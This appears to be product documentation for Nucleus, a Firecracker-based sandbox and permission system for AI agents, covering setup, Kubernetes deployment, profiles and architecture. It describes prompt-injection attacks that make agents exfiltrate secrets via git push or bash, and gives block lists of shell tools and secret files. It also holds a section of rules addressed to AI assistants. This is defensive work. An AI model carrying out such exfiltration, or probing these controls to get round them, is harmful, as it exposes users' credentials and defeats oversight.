limactl shell nucleus -- ss -tlnp | grep 8080

# View nucleus-node logs
limactl shell nucleus -- journalctl -u nucleus-node -f
```
Commands Reference
| Command | Description |
|---|---|
| `nucleus setup` | Initial setup (Lima VM, secrets, config) |
| `nucleus setup --force` | Recreate VM and config |
| `nucleus start` | Start nucleus-node service |
| `nucleus start --no-wait` | Start without health check |
| `nucleus stop` | Stop nucleus-node |
| `nucleus stop --stop-vm` | Stop nucleus-node AND Lima VM |
| `nucleus doctor` | Diagnose issues |
| `nucleus run "task"` | Run a task |
Advanced Configuration
Custom VM Resources
```bash
nucleus setup --vm-cpus 8 --vm-memory-gib 16 --vm-disk-gib 100
```
Rotate Secrets
```bash
nucleus setup --rotate-secrets
```
Skip VM Setup (manual Lima management)
```bash
nucleus setup --skip-vm
```
Configuration File
Edit `~/.config/nucleus/config.toml`:

```toml
[vm]
name = "nucleus"
auto_start = true
cpus = 4
memory_gib = 8

[node]
url = "http://127.0.0.1:8080"

[budget]
max_cost_usd = 5.0
max_input_tokens = 100000
max_output_tokens = 10000
```
Kubernetes Quickstart
Deploy Firecracker-isolated AI agent sandboxes on Kubernetes with fine-grained permission control.
Why Nucleus on Kubernetes?
| Feature | Google Agent Sandbox | Nucleus |
|---|---|---|
| Isolation | gVisor (syscall filter) | Firecracker (hardware VM) |
| Attack surface | ~300 syscalls exposed | ~50K lines Rust, KVM-backed |
| Permission model | Pod RBAC only | Lattice-guard with uninhabitable state detection |
| Startup time | <1s (warm pool) | <125ms (Firecracker) |
| Memory overhead | ~50MB | ~5MB per microVM |
Nucleus provides hardware-level isolation with a mathematical permission model that automatically detects dangerous capability combinations (the “uninhabitable state”).
Prerequisites
- Kubernetes cluster with Linux nodes (kernel 5.10+)
- Nodes with `/dev/kvm` access (nested virt or bare metal)
- `kubectl` configured
Architecture
```
┌─────────────────────────────────────────────────────────────┐
│ Kubernetes Cluster                                          │
├─────────────────────────────────────────────────────────────┤
│ ┌─────────────────┐ ┌─────────────────┐                     │
│ │ nucleus-node    │ │ nucleus-node    │ (DaemonSet)         │
│ │ ┌───────────┐   │ │ ┌───────────┐   │                     │
│ │ │Firecracker│   │ │ │Firecracker│   │                     │
│ │ │  microVM  │   │ │ │  microVM  │   │                     │
│ │ │┌─────────┐│   │ │ │┌─────────┐│   │                     │
│ │ ││tool-    ││   │ │ ││tool-    ││   │                     │
│ │ ││proxy    ││   │ │ ││proxy    ││   │                     │
│ │ │└─────────┘│   │ │ │└─────────┘│   │                     │
│ │ └───────────┘   │ │ └───────────┘   │                     │
│ └─────────────────┘ └─────────────────┘                     │
│          │                   │                              │
│          └────────┬──────────┘                              │
│                   ▼                                         │
│ ┌─────────────────────────────────────┐                     │
│ │ nucleus-controller                  │ (Deployment)        │
│ │ - Watches NucleusSandbox CRDs       │                     │
│ │ - Schedules pods to nodes           │                     │
│ │ - Enforces permission lattice       │                     │
│ └─────────────────────────────────────┘                     │
└─────────────────────────────────────────────────────────────┘
```
Quick Deploy
1. Create Namespace
```bash
kubectl create namespace nucleus-system
```
2. Deploy nucleus-node DaemonSet
```yaml
# nucleus-node-daemonset.yaml
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: nucleus-node
  namespace: nucleus-system
spec:
  selector:
    matchLabels:
      app: nucleus-node
  template:
    metadata:
      labels:
        app: nucleus-node
    spec:
      hostPID: true
      hostNetwork: true
      containers:
        - name: nucleus-node
          image: ghcr.io/coproduct-opensource/nucleus-node:latest
          securityContext:
            privileged: true  # Required for Firecracker + KVM
          env:
            - name: NUCLEUS_NODE_LISTEN
              value: "0.0.0.0:8080"
            - name: NUCLEUS_NODE_DRIVER
              value: "firecracker"
            - name: NUCLEUS_NODE_FIRECRACKER_NETNS
              value: "true"
          volumeMounts:
            - name: dev-kvm
              mountPath: /dev/kvm
            - name: pods
              mountPath: /var/lib/nucleus/pods
          ports:
            - containerPort: 8080
              hostPort: 8080
      volumes:
        - name: dev-kvm
          hostPath:
            path: /dev/kvm
        - name: pods
          hostPath:
            path: /var/lib/nucleus/pods
            type: DirectoryOrCreate
      nodeSelector:
        nucleus.io/kvm: "true"
```

```bash
# Label nodes with KVM support
kubectl label nodes <node-name> nucleus.io/kvm=true

# Deploy
kubectl apply -f nucleus-node-daemonset.yaml
```
3. Create a Sandbox
```yaml
# sandbox.yaml
apiVersion: v1
kind: ConfigMap
metadata:
  name: agent-sandbox-spec
  namespace: nucleus-system
data:
  pod.yaml: |
    apiVersion: nucleus.io/v1
    kind: PodSpec
    metadata:
      name: code-review-agent
    spec:
      profile: code-review
      work_dir: /workspace
      timeout_seconds: 3600
      # Permission overrides
      capabilities:
        read_files: always
        write_files: never
        edit_files: never
        run_bash: never
        web_search: low_risk
        web_fetch: never
        git_commit: never
        git_push: never
        create_pr: never
      # Network policy
      network:
        dns_allow:
          - "api.anthropic.com:443"
          - "api.openai.com:443"
```
4. Launch Agent via API
# Port-forward to nucleus-node
kubectl port-forward -n nucleus-system daemonset/nucleus-node 8080:8080 &
# Create sandbox
curl -X POST http://localhost:8080/v1/pods \
-H "Content-Type: application/yaml" \
-d @sandbox.yaml
Permission Profiles
Nucleus includes built-in profiles for common agent patterns:
| Profile | Use Case | Capabilities |
|---|---|---|
| read-only | Code exploration | Read files, no writes/network |
| code-review | PR review agents | Read + web search for context |
| fix-issue | Bug fix agents | Full dev workflow, uninhabitable state protected |
| demo | Live demos | Blocks shell interpreters |
Uninhabitable State Protection
When an agent has all three dangerous capabilities:
- Private data access (read_files ≥ low_risk)
- Untrusted content (web_fetch OR web_search ≥ low_risk)
- Exfiltration channel (git_push OR create_pr OR run_bash ≥ low_risk)
Nucleus automatically requires human approval for exfiltration actions. This protects against prompt injection attacks that could steal secrets.
Agent requests: git push origin main
┌─────────────────────────────────────────┐
│ ⚠️ uninhabitable state PROTECTION TRIGGERED │
│ │
│ This agent has: │
│ ✓ Read access to files │
│ ✓ Web access (prompt injection risk) │
│ ✓ Git push capability │
│ │
│ Approve this operation? [y/N] │
└─────────────────────────────────────────┘
Comparison with Agent Sandbox
Security Model
Google Agent Sandbox uses gVisor, which intercepts syscalls in userspace:
App → Sentry (Go) → Host Kernel
↓
Filters ~300 syscalls
Nucleus uses Firecracker with full hardware virtualization:
App → Guest Kernel → Firecracker VMM → KVM → Host Kernel
↓
~50K lines Rust
Minimal device model
When to Choose Nucleus
Choose Nucleus when you need:
- Hardware isolation: Defense against kernel exploits
- Permission governance: Fine-grained capability control beyond RBAC
- Compliance: SOC2, HIPAA, NIST frameworks requiring VM-level isolation
- Prompt injection defense: Automatic uninhabitable state detection
Choose Agent Sandbox when you need:
- Faster iteration: Lighter weight for development
- GKE integration: Native warm pools and pod snapshots
- Higher density: More sandboxes per node
Roadmap: Native CRDs
We’re working on native Kubernetes CRDs to match Agent Sandbox ergonomics:
```yaml
# Coming soon
apiVersion: nucleus.io/v1
kind: NucleusSandbox
metadata:
  name: my-agent
spec:
  profile: fix-issue
  workDir: /workspace
  image: python:3.12-slim
  # Lattice-guard permissions
  permissions:
    capabilities:
      read_files: always
      run_bash: low_risk
    paths:
      allowed: ["/workspace/**"]
      blocked: ["**/.env", "**/*.pem"]
    budget:
      max_cost_usd: 5.00
---
apiVersion: nucleus.io/v1
kind: NucleusSandboxClaim
metadata:
  name: agent-session
spec:
  templateRef: my-agent
  ttl: 1h
```
Track progress: GitHub Issues
Agent Sandbox Integration
Run AI agent sandboxes on Kubernetes using Agent Sandbox with Firecracker isolation via Kata Containers.
Overview
Agent Sandbox is a CNCF/Kubernetes SIG Apps project that provides Kubernetes-native primitives for running AI agents in isolated environments. It supports pluggable runtimes via the standard runtimeClassName field.
This guide covers two paths:
| Path | Runtime | KVM Required | Use Case |
|---|---|---|---|
| Local (gVisor) | runsc | No | Validate workflow on macOS/Windows |
| Cloud (kata-fc) | Firecracker | Yes | Production with hardware VM isolation |
Comparison: Agent Sandbox vs Nucleus
| Feature | Agent Sandbox + gVisor | Agent Sandbox + kata-fc | Nucleus |
|---|---|---|---|
| Isolation | Syscall filter | Firecracker VM | Firecracker VM |
| Memory overhead | ~50MB | ~130MB | ~5MB |
| Startup time | <1s | ~1-2s | <125ms |
| Permission model | Pod RBAC only | Pod RBAC only | Lattice-guard |
| Uninhabitable state detection | No | No | Yes |
| Budget enforcement | No | No | Yes |
Use Agent Sandbox + kata-fc when you need:
- Standard Kubernetes CRD workflow
- Firecracker isolation without custom controllers
- Compatibility with existing k8s tooling (Argo CD, Flux)
Use Nucleus directly when you need:
- Fine-grained permission policies (portcullis)
- Automatic uninhabitable state detection (prompt injection defense)
- Lower memory footprint and faster startup
Local Testing: gVisor on kind (Intel Mac / No KVM)
This path validates the Agent Sandbox workflow without requiring KVM. Useful for development on Intel Macs or any system without nested virtualization.
Prerequisites
- Docker Desktop running
- `kubectl` configured
- `kind` installed (`brew install kind`)
Step 1: Download gVisor Binaries
# Create directory for gVisor binaries
mkdir -p /tmp/gvisor
# Download runsc (gVisor runtime)
curl -sL https://storage.googleapis.com/gvisor/releases/release/latest/x86_64/runsc \
-o /tmp/gvisor/runsc
chmod +x /tmp/gvisor/runsc
# Download containerd shim
curl -sL https://storage.googleapis.com/gvisor/releases/release/latest/x86_64/containerd-shim-runsc-v1 \
-o /tmp/gvisor/containerd-shim-runsc-v1
chmod +x /tmp/gvisor/containerd-shim-runsc-v1
Step 2: Create kind Cluster
# Create kind config
cat > /tmp/kind-gvisor.yaml << 'EOF'
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
  - role: control-plane
    extraMounts:
      - hostPath: /tmp/gvisor
        containerPath: /opt/gvisor
EOF
# Create cluster
kind create cluster --name agent-sandbox-test --config /tmp/kind-gvisor.yaml
Step 3: Install gVisor in kind Node
# Copy binaries into the kind node
docker cp /tmp/gvisor/runsc agent-sandbox-test-control-plane:/usr/local/bin/runsc
docker cp /tmp/gvisor/containerd-shim-runsc-v1 agent-sandbox-test-control-plane:/usr/local/bin/containerd-shim-runsc-v1
# Configure containerd to use gVisor
docker exec agent-sandbox-test-control-plane bash -c '
cat >> /etc/containerd/config.toml << EOF
[plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runsc]
runtime_type = "io.containerd.runsc.v1"
EOF
'
# Restart containerd
docker exec agent-sandbox-test-control-plane systemctl restart containerd
# Create RuntimeClass
kubectl apply -f - << 'EOF'
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc
EOF
Step 4: Install Agent Sandbox
# Install Agent Sandbox CRDs and controller
kubectl apply -f https://github.com/kubernetes-sigs/agent-sandbox/releases/download/v0.1.0/manifest.yaml
# Wait for controller to be ready
kubectl wait --for=condition=Ready pod -l app=agent-sandbox-controller \
-n agent-sandbox-system --timeout=120s
Step 5: Create Test Sandbox
kubectl apply -f - << 'EOF'
apiVersion: agents.x-k8s.io/v1alpha1
kind: Sandbox
metadata:
  name: gvisor-test
spec:
  podTemplate:
    spec:
      runtimeClassName: gvisor
      containers:
        - name: agent
          image: busybox:latest
          command: ["sleep", "infinity"]
EOF
# Watch for Ready status
kubectl wait --for=condition=Ready sandbox/gvisor-test --timeout=60s
Step 6: Verify gVisor Isolation
# Confirm runtimeClassName
kubectl get pod gvisor-test -o jsonpath='{.spec.runtimeClassName}'
# Output: gvisor
# Verify gVisor kernel (look for "Starting gVisor...")
kubectl exec gvisor-test -- dmesg | head -5
# Output:
# [ 0.000000] Starting gVisor...
# [ 0.533579] Gathering forks...
# ...
Cleanup
kubectl delete sandbox gvisor-test
kind delete cluster --name agent-sandbox-test
Cloud Testing: Firecracker on KVM Cluster
This path provides hardware VM isolation using Firecracker via Kata Containers.
Prerequisites
- Kubernetes cluster with KVM-enabled nodes (bare metal or nested virt)
  - GKE: Use `n2-standard-*` with nested virtualization enabled
  - EKS: Use metal instances (`m5.metal`, `c5.metal`)
  - On-prem: Nodes with `/dev/kvm` accessible
- `kubectl` configured
- Helm 3.x installed
Step 1: Label KVM-Capable Nodes
# Identify nodes with KVM support
for node in $(kubectl get nodes -o name); do
if kubectl debug $node -it --image=busybox -- test -c /dev/kvm 2>/dev/null; then
echo "$node has KVM"
kubectl label $node katacontainers.io/kata-runtime=true --overwrite
fi
done
Step 2: Install Kata Containers with Firecracker
# Add Kata Containers Helm repo
helm repo add kata-containers https://kata-containers.github.io/kata-containers
helm repo update
# Install Kata with Firecracker hypervisor
helm install kata-fc kata-containers/kata-deploy \
--namespace kata-system --create-namespace \
--set hypervisor=fc \
--set runtimeClasses[0].name=kata-fc \
--set runtimeClasses[0].handler=kata-fc
# Wait for DaemonSet rollout
kubectl rollout status daemonset/kata-deploy -n kata-system --timeout=300s
# Verify RuntimeClass exists
kubectl get runtimeclass kata-fc
Step 3: Install Agent Sandbox
# Install Agent Sandbox CRDs and controller
kubectl apply -f https://github.com/kubernetes-sigs/agent-sandbox/releases/download/v0.1.0/manifest.yaml
# Wait for controller
kubectl wait --for=condition=Ready pod -l app=agent-sandbox-controller \
-n agent-sandbox-system --timeout=120s
Step 4: Create Firecracker-Isolated Sandbox
kubectl apply -f - << 'EOF'
apiVersion: agents.x-k8s.io/v1alpha1
kind: Sandbox
metadata:
  name: firecracker-test
spec:
  podTemplate:
    spec:
      runtimeClassName: kata-fc
      containers:
        - name: agent
          image: python:3.12-slim
          command: ["sleep", "infinity"]
          resources:
            requests:
              memory: "256Mi"
              cpu: "100m"
            limits:
              memory: "512Mi"
              cpu: "500m"
EOF
# Wait for Ready
kubectl wait --for=condition=Ready sandbox/firecracker-test --timeout=120s
Step 5: Verify Firecracker Isolation
# Confirm kata-fc runtime
kubectl get pod firecracker-test -o jsonpath='{.spec.runtimeClassName}'
# Output: kata-fc
# Check for VM indicators in /proc/cpuinfo
kubectl exec firecracker-test -- cat /proc/cpuinfo | grep -E "(model name|hypervisor)"
# Should show hypervisor or QEMU-style CPU
# Verify Firecracker process on host (from node)
NODE=$(kubectl get pod firecracker-test -o jsonpath='{.spec.nodeName}')
kubectl debug node/$NODE -it --image=busybox -- ps aux | grep firecracker
Agent Sandbox CRD Reference
Sandbox
The core resource for creating isolated agent environments.
```yaml
apiVersion: agents.x-k8s.io/v1alpha1
kind: Sandbox
metadata:
  name: my-agent
spec:
  # Standard PodSpec template
  podTemplate:
    spec:
      runtimeClassName: kata-fc # or gvisor
      containers:
        - name: agent
          image: my-agent:latest
          command: ["python", "agent.py"]
          env:
            - name: OPENAI_API_KEY
              valueFrom:
                secretKeyRef:
                  name: agent-secrets
                  key: openai-key
          resources:
            requests:
              memory: "512Mi"
              cpu: "250m"
            limits:
              memory: "2Gi"
              cpu: "2"
  # Persistent storage (survives restarts)
  volumeClaimTemplates:
    - metadata:
        name: workspace
      spec:
        accessModes: ["ReadWriteOnce"]
        resources:
          requests:
            storage: 10Gi
  # Lifecycle management
  shutdownPolicy: Delete # or Retain
```
SandboxTemplate (Extensions)
Reusable templates for common agent configurations.
# Install extensions
kubectl apply -f https://github.com/kubernetes-sigs/agent-sandbox/releases/download/v0.1.0/extensions.yaml
```yaml
apiVersion: agents.x-k8s.io/v1alpha1
kind: SandboxTemplate
metadata:
  name: python-agent
spec:
  podTemplate:
    spec:
      runtimeClassName: kata-fc
      containers:
        - name: agent
          image: python:3.12-slim
          resources:
            requests:
              memory: "512Mi"
            limits:
              memory: "2Gi"
```
SandboxClaim
Request a sandbox from a template.
```yaml
apiVersion: agents.x-k8s.io/v1alpha1
kind: SandboxClaim
metadata:
  name: my-session
spec:
  templateRef:
    name: python-agent
  ttl: 1h
```
Troubleshooting
Pod stuck in ContainerCreating
gVisor: Check for missing shim binary.
kubectl describe pod <pod-name> | grep -A5 Events
# Look for: "containerd-shim-runsc-v1": file does not exist
Fix: Ensure both runsc and containerd-shim-runsc-v1 are in /usr/local/bin/.
kata-fc: Check for KVM access.
kubectl debug node/<node> -it --image=busybox -- ls -la /dev/kvm
# Should show: crw-rw---- 1 root kvm 10, 232 ...
Sandbox stuck in Pending
Check if the controller is running:
kubectl get pods -n agent-sandbox-system
kubectl logs -n agent-sandbox-system -l app=agent-sandbox-controller
RuntimeClass not found
Verify the RuntimeClass exists:
kubectl get runtimeclass
For gVisor, create manually:
kubectl apply -f - << 'EOF'
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc
EOF
Next Steps
- Kubernetes Quickstart - Deploy Nucleus directly on Kubernetes
- Permission Model - Understanding portcullis policies
- Threat Model - Security analysis
Nucleus Permissions Guide
TL;DR for AI Assistants
You have a permission profile. Check it before acting.
- "Never" = blocked, don't try
- "LowRisk" = allowed for safe operations
- "Always" = always allowed
If you have read_files + web access + git push all enabled,
exfiltration actions (git push, create PR, bash) require human approval.
This is the "uninhabitable state protection" - it prevents prompt injection attacks
from stealing secrets.
The Problem: Uninhabitable State
When an AI agent has all three of these capabilities at autonomous levels:
| Capability | Example | Risk |
|---|---|---|
| Private data access | Reading files, credentials | Sees secrets |
| Untrusted content | Web search, fetching URLs | Prompt injection vector |
| External communication | Git push, create PR, bash | Exfiltration channel |
…a single prompt injection can exfiltrate your SSH keys, API tokens, or source code.
Nucleus automatically detects this combination and requires human approval for exfiltration actions.
Permission Levels
Each tool capability has one of three levels:
Never → Blocked entirely
↓
LowRisk → Auto-approved for safe operations
↓
Always → Always auto-approved
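Viewed as a lattice, the three levels form a simple chain. A minimal Python sketch of the ordering (the `Level` enum and `meet`/`join` helpers are illustrative, not the actual Nucleus API):

```python
from enum import IntEnum

class Level(IntEnum):
    """Three-level capability state; higher grants more autonomy."""
    NEVER = 0      # blocked entirely
    LOW_RISK = 1   # auto-approved for safe operations
    ALWAYS = 2     # always auto-approved

# The levels form a chain, so comparison is integer order:
assert Level.NEVER < Level.LOW_RISK < Level.ALWAYS

def meet(a: Level, b: Level) -> Level:
    """Restriction: combining two grants can only lower authority."""
    return min(a, b)

def join(a: Level, b: Level) -> Level:
    """Least upper bound of two requested levels."""
    return max(a, b)

print(meet(Level.ALWAYS, Level.LOW_RISK).name)  # LOW_RISK
```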
Example
```yaml
capabilities:
  read_files: always    # Can always read files
  write_files: low_risk # Can write to safe locations
  run_bash: never       # Cannot run shell commands
  web_fetch: low_risk   # Can fetch approved URLs
  git_push: low_risk    # Can push (but may need approval)
```
Built-in Profiles
filesystem-readonly
Read-only with sensitive paths blocked.
read_files: always web_search: never git_push: never
write_files: never web_fetch: never create_pr: never
edit_files: never git_commit: never run_bash: never
read-only
Safe for exploration. No writes, no network, no git.
read_files: always web_search: never git_push: never
write_files: never web_fetch: never create_pr: never
edit_files: never git_commit: never
network-only
Web-only access, no filesystem or execution.
read_files: never web_search: low_risk git_push: never
write_files: never web_fetch: low_risk create_pr: never
edit_files: never git_commit: never run_bash: never
web-research
Read + web search/fetch, no writes or exec.
read_files: low_risk web_search: low_risk git_push: never
write_files: never web_fetch: low_risk create_pr: never
edit_files: never git_commit: never run_bash: never
code-review
Read code, search web for context, but no modifications.
read_files: always web_search: low_risk git_push: never
write_files: never web_fetch: never create_pr: never
edit_files: never git_commit: never
edit-only
Write + edit without shell or web.
read_files: always web_search: never git_push: never
write_files: low_risk web_fetch: never create_pr: never
edit_files: low_risk git_commit: never run_bash: never
local-dev
Local development workflow without web access.
read_files: always web_search: never git_push: never
write_files: low_risk web_fetch: never create_pr: never
edit_files: low_risk git_commit: low_risk run_bash: low_risk
fix-issue
Full development workflow with uninhabitable state protection.
read_files: always web_search: low_risk git_push: low_risk*
write_files: low_risk web_fetch: low_risk create_pr: low_risk*
edit_files: low_risk git_commit: low_risk
run_bash: low_risk
* Requires approval due to uninhabitable state detection
release
Release/publish workflow with approvals on exfiltration.
read_files: always web_search: low_risk git_push: low_risk*
write_files: low_risk web_fetch: low_risk create_pr: low_risk*
edit_files: low_risk git_commit: low_risk run_bash: low_risk
* Requires approval
database-client
Database CLI access only (psql/mysql/redis).
read_files: never web_search: never git_push: never
write_files: never web_fetch: never create_pr: never
edit_files: never git_commit: never run_bash: low_risk
demo
For live demos - blocks shell interpreters.
read_files: always web_search: low_risk git_push: low_risk
write_files: low_risk web_fetch: low_risk create_pr: low_risk
edit_files: low_risk git_commit: low_risk
run_bash: low_risk (blocked: python, node, bash, etc.)
Workflow Profiles (Orchestrated Agents)
These profiles are designed for multi-agent workflows where different agents have specialized roles. They’re optimized for security through architectural constraints.
pr-review (alias: pr_review)
For automated PR review agents. Read-only + web access, no exfiltration.
read_files: always web_search: low_risk git_push: never
write_files: never web_fetch: low_risk create_pr: never
edit_files: never git_commit: never run_bash: never
**Uninhabitable state status**: NOT vulnerable (no exfiltration capability)
Use case: Review PRs, post comments via GitHub API, analyze diffs. Note: run_bash is disabled because it’s an exfil vector when combined with web access.
codegen
For isolated code generation agents. Full dev capabilities, NO network access.
read_files: always web_search: never git_push: never
write_files: low_risk web_fetch: never create_pr: never
edit_files: low_risk git_commit: low_risk run_bash: low_risk
**Uninhabitable state status**: NOT vulnerable (no untrusted content exposure)
Use case: Implement features in a Firecracker microVM, run tests, commit locally. Network isolation prevents prompt injection attacks from web content.
pr-approve (alias: pr_approve)
For automated PR approval agents. Can merge PRs after CI verification.
read_files: always web_search: low_risk git_push: low_risk*
write_files: never web_fetch: low_risk create_pr: never
edit_files: never git_commit: never run_bash: low_risk*
* Requires approval (uninhabitable state-gated)
**Uninhabitable state status**: VULNERABLE → `git_push` and `run_bash` require approval
Use case: Verify CI status via GitHub API, then merge approved PRs. The uninhabitable state protection means git_push is gated on human/CI approval.
Uninhabitable State Detection
When Nucleus detects the uninhabitable state, it automatically adds approval obligations to exfiltration vectors:
Your permissions:
read_files: always ← Private data access ✓
web_fetch: low_risk ← Untrusted content ✓
git_push: low_risk ← Exfiltration vector ✓
Uninhabitable state detected! Adding approval requirement:
git_push: requires approval
create_pr: requires approval
run_bash: requires approval
This happens automatically. You don’t configure it, and you can’t disable it, even via malicious JSON payloads: the constraint is enforced on deserialization.
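The detection rule above can be sketched in a few lines. This is illustrative only: the integer level encoding (`never=0`, `low_risk=1`, `always=2`) and the function names are assumptions, not Nucleus's actual implementation of ν.

```python
LOW_RISK = 1  # never=0, low_risk=1, always=2 (illustrative encoding)

def detect_uninhabitable(caps: dict) -> bool:
    """All three legs at autonomous levels => uninhabitable state."""
    private = caps.get("read_files", 0) >= LOW_RISK
    untrusted = max(caps.get("web_fetch", 0), caps.get("web_search", 0)) >= LOW_RISK
    exfil = max(caps.get("git_push", 0), caps.get("create_pr", 0),
                caps.get("run_bash", 0)) >= LOW_RISK
    return private and untrusted and exfil

def normalize(caps: dict, approvals=None):
    """Sketch of normalization: attach approval obligations when detected."""
    approvals = set(approvals or ())
    if detect_uninhabitable(caps):
        approvals |= {"git_push", "create_pr", "run_bash"}
    return caps, approvals

caps = {"read_files": 2, "web_fetch": 1, "git_push": 1}
_, obligations = normalize(caps)
print(sorted(obligations))  # ['create_pr', 'git_push', 'run_bash']
```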
For AI Assistants: How to Check Permissions
Before Taking Action
```python
# Pseudocode for AI tool execution
if action.type == "git_push":
    if permissions.requires_approval("git_push"):
        return "I need approval to push. Shall I proceed?"
    else:
        execute(action)
```
Understanding Your Profile
When you receive a permission profile, check:
1. **What level is each capability?**
   - `never` = don’t attempt
   - `low_risk` = safe operations okay
   - `always` = go ahead
2. **Is the uninhabitable state active?**
   - If `read_files >= low_risk` AND `web_* >= low_risk` AND `git_push >= low_risk`
   - Then `git_push`, `create_pr`, `run_bash` need approval
3. **Check path restrictions**
   - `allowed_paths`: only these directories
   - `blocked_paths`: never touch these (e.g., `**/.env`, `**/*.pem`)
4. **Check budget**
   - `max_cost_usd`: spending limit
   - `max_tokens`: token limits
5. **Check time**
   - `valid_until`: when permissions expire
Path Restrictions
```yaml
paths:
  allowed:
    - "/workspace/**"          # Only workspace
    - "/home/user/project/**"  # Or specific project
  blocked:
    - "**/.env"       # No .env files
    - "**/.env.*"     # No .env.local, etc.
    - "**/secrets.*"  # No secrets files
    - "**/*.pem"      # No private keys
    - "**/*.key"      # No key files
```
Command Restrictions
```yaml
commands:
  blocked:
    - program: "bash"    # No bash
      args: ["*"]
    - program: "python"  # No python interpreter
      args: ["*"]
    - program: "curl"    # No curl to arbitrary URLs
      args: ["*"]
  allowed:
    - program: "git"     # Git is okay
      args: ["status", "*"]
    - program: "cargo"   # Cargo is okay
      args: ["build", "*"]
```
Budget Limits
```yaml
budget:
  max_cost_usd: 5.00        # $5 spending cap
  max_input_tokens: 100000  # 100k input tokens
  max_output_tokens: 10000  # 10k output tokens
```
Time Limits
```yaml
time:
  valid_from: "2024-01-01T00:00:00Z"
  valid_until: "2024-01-01T01:00:00Z" # 1 hour session
```
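Budget and time limits amount to a gate checked before each operation. A hedged sketch, using the field names from the YAML above (the `check_limits` function itself is illustrative, not the proxy's real code):

```python
from datetime import datetime

def check_limits(spent_usd: float, now_iso: str, budget: dict, window: dict) -> str:
    """Deny when the budget is exhausted or the session window has lapsed."""
    if spent_usd > budget["max_cost_usd"]:
        return "denied: budget exceeded"
    # Parse RFC 3339 timestamps (Python's fromisoformat wants +00:00, not Z)
    now = datetime.fromisoformat(now_iso.replace("Z", "+00:00"))
    start = datetime.fromisoformat(window["valid_from"].replace("Z", "+00:00"))
    end = datetime.fromisoformat(window["valid_until"].replace("Z", "+00:00"))
    if not (start <= now <= end):
        return "denied: outside validity window"
    return "allowed"

budget = {"max_cost_usd": 5.00}
window = {"valid_from": "2024-01-01T00:00:00Z", "valid_until": "2024-01-01T01:00:00Z"}
print(check_limits(1.25, "2024-01-01T00:30:00Z", budget, window))  # allowed
print(check_limits(9.99, "2024-01-01T00:30:00Z", budget, window))  # denied: budget exceeded
```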
Delegation (Sub-agents)
When delegating to a sub-agent, permissions can only go down, never up:
Parent: read_files=always, write_files=low_risk
Child request: write_files=always
Result: write_files=low_risk (capped at parent level)
This is enforced mathematically via the lattice meet operation.
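The capping described above is a pointwise meet over capability levels. An illustrative sketch (not the actual portcullis code; unknown capabilities defaulting to `never` is an assumption):

```python
LEVELS = {"never": 0, "low_risk": 1, "always": 2}
NAMES = {v: k for k, v in LEVELS.items()}

def delegate(parent: dict, child_request: dict) -> dict:
    """Child authority is the pointwise meet (min) with the parent's levels:
    permissions can only go down, never up."""
    out = {}
    for cap, requested in child_request.items():
        cap_parent = parent.get(cap, "never")  # caps the parent never held stay never
        out[cap] = NAMES[min(LEVELS[cap_parent], LEVELS[requested])]
    return out

parent = {"read_files": "always", "write_files": "low_risk"}
child = delegate(parent, {"write_files": "always", "run_bash": "low_risk"})
print(child)  # {'write_files': 'low_risk', 'run_bash': 'never'}
```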
Quick Reference Card
┌─────────────────────────────────────────────────────────────┐
│ PERMISSION LEVELS │
├─────────────────────────────────────────────────────────────┤
│ never Blocked. Don't attempt. │
│ low_risk Allowed for safe operations. │
│ always Always allowed. │
├─────────────────────────────────────────────────────────────┤
│ uninhabitable state RULE │
├─────────────────────────────────────────────────────────────┤
│ IF read_files ≥ low_risk │
│ AND (web_fetch OR web_search) ≥ low_risk │
│ AND (git_push OR create_pr OR run_bash) ≥ low_risk │
│ THEN exfiltration actions require approval │
├─────────────────────────────────────────────────────────────┤
│ BUILT-IN PROFILES │
├─────────────────────────────────────────────────────────────┤
│ filesystem-readonly Read + search; blocks sensitive paths │
│ read-only Explore only, no writes │
│ network-only Web-only access │
│ web-research Read + web search/fetch │
│ code-review Read + web search, no modifications │
│ edit-only Write/edit, no exec or web │
│ local-dev Write + shell, no web │
│ fix-issue Full dev workflow, uninhabitable state protected │
│ release Push/PR with approvals │
│ database-client DB CLI only │
│ demo For demos, blocks interpreters │
│ permissive Everything allowed (trusted only) │
│ restrictive Minimal permissions │
├─────────────────────────────────────────────────────────────┤
│ WORKFLOW PROFILES │
├─────────────────────────────────────────────────────────────┤
│ pr-review Read + web, NO exfil (safe) │
│ codegen Write + bash, NO network (isolated) │
│ pr-approve Read + web + push (CI-gated approval) │
└─────────────────────────────────────────────────────────────┘
Architecture Overview
Goals
- Enforce all side effects via a policy-aware proxy inside a Firecracker VM (Firecracker driver).
- Treat permission state as a static envelope around a dynamic agent.
- Default network egress to deny; explicit allowlists only (host netns iptables + guest defense).
- The node provisions a per-pod netns, tap interface, and guest IP; guest init configures eth0 from kernel args.
- Netns setup enables bridge netfilter (`br_netfilter`) so iptables can enforce guest egress.
- Approvals require signed tokens issued by an authority (HMAC today; external authority roadmap).
- Provide verifiable audit logs for every operation (signed + verified).
Trust Boundaries
Agent / Tool Adapter
| (signed HTTP)
v
Host Control Plane (nucleus-node + signed proxy)
| (vsock bridge, no guest TCP)
v
Firecracker VM (nucleus-tool-proxy + enforcement runtime)
| (cap-std, Executor)
v
Side effects (filesystem/commands)
Boundary 1: Agent -> Control Plane
- Requests are signed (HMAC today; asymmetric is roadmap).
- Control plane forwards only to the VM proxy.
Boundary 2: Control Plane -> VM
- Use vsock only by default; guest NIC requires an explicit network policy and host enforcement.
- Host enforcement uses `nsenter` + `iptables` inside the Firecracker netns (Linux only).
- By default the guest sees only proxy traffic; optional network egress is allowlisted.
Boundary 3: VM -> Host
- No host filesystem access except mounted scratch.
- Rootfs is read-only; scratch is per-pod and limited.
Components
nucleus-node (host)
- Pod lifecycle (Firecracker + resources).
- Starts vsock bridge to the proxy.
- Applies cgroups/seccomp to the VMM process.
- Starts a signed proxy on 127.0.0.1.
approval authority (host, separate process, roadmap)
- Issues signed approval bundles (roadmap).
- Logs approvals with signatures.
- Enforces replay protection and expiration.
nucleus-tool-proxy (guest)
- Enforces permissions (Sandbox + Executor).
- Requires approvals for gated ops (counter-based today; signed requests required; bundles are roadmap).
- Writes signed audit log entries (verifiable with `nucleus-audit`).
- Guest init (Rust) configures networking from kernel args and then `exec`s the proxy.
- Guest init emits a boot report into the audit log on startup.
policy model (shared)
- Capability lattice + obligations.
